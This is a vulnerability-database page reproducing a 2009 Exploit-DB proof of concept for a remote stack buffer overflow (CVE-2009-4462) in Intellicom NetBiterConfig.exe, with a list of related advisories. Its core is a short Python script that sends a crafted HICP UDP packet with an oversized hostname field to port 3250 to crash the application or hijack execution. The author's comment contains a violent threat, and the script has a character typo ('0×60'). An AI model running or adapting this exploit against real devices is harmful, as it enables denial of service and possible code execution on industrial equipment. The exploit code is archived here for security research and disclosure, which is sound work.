Lucene search
+L

Intellicom 1.3 - 'NetBiterConfig.exe Hostname' Data Remote Stack Buffer Overflow (PoC)

🗓️ 14 Dec 2009 00:00:00Reported by Ruben SantamartaType 
exploitdb
 exploitdb
🔗 www.exploit-db.com👁 37 Views

Intellicom 'NetBiterConfig.exe' 1.3 Remote Stack Buffer Overflo

Related
Code
ReporterTitlePublishedViews
Family
circl
Circl
CVE-2009-4462
14 Dec 200900:00
circl
cve
CVE
CVE-2009-4462
30 Dec 200919:00
cve
cvelist
Cvelist
CVE-2009-4462
30 Dec 200919:00
cvelist
exploitdb
Exploit DB
HMS HICP Protocol + Intellicom - 'NetBiterConfig.exe' Remote Buffer Overflow
14 Dec 200900:00
exploitdb
nessus
Tenable Nessus
Netbiter Config NetbiterConfig.exe Device Hostname Remote Overflow
30 Dec 200900:00
nessus
nvd
NVD
CVE-2009-4462
30 Dec 200920:00
nvd
prion
Prion
Stack overflow
30 Dec 200920:00
prion
cert
CERT
IntelliCom NetBiter Config HICP hostname buffer overflow
24 Mar 201000:00
cert
#!/usr/bin/python
#
#source: https://www.securityfocus.com/bid/37325/info
#
#Intellicom 'NetBiterConfig.exe' is prone to a remote stack-based buffer-overflow vulnerability because the application fails to perform adequate boundary checks on user-supplied data.
#
#Attackers can exploit this issue to execute arbitrary code within the context of the affected application. Failed exploit attempts will result in a denial-of-service condition.
#

# Intellicom NetBiterConfig.exe 1.3.0 Remote Stack Overwrite.
# Ruben Santamarta - www.reversemode.com
# For research purposes ONLY.
# If you use this code to cause damage I’ll cut you open like a f***ing pig.

import sys
import socket

s = socket.socket(socket.AF_INET,socket.SOCK_DGRAM)
s.connect(("10.10.10.10",3250))
s.send("protocol version = 1.10; "
       +"fb type = EVIL-DEVICE; "
       +"module version = 0.66.6; "
       +"mac = 00-30-11-00-BA-CA; "
       +"ip = 192.168.1.52; "
       +"sn = 255.255.255.0; "
       +"gw = 192.168.1.1; "
       +"dhcp = off; "
       +"pswd = off; "
       +"hn = "+"A"*0×60+"; "
       +"dns1 = 192.168.1.33;")

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation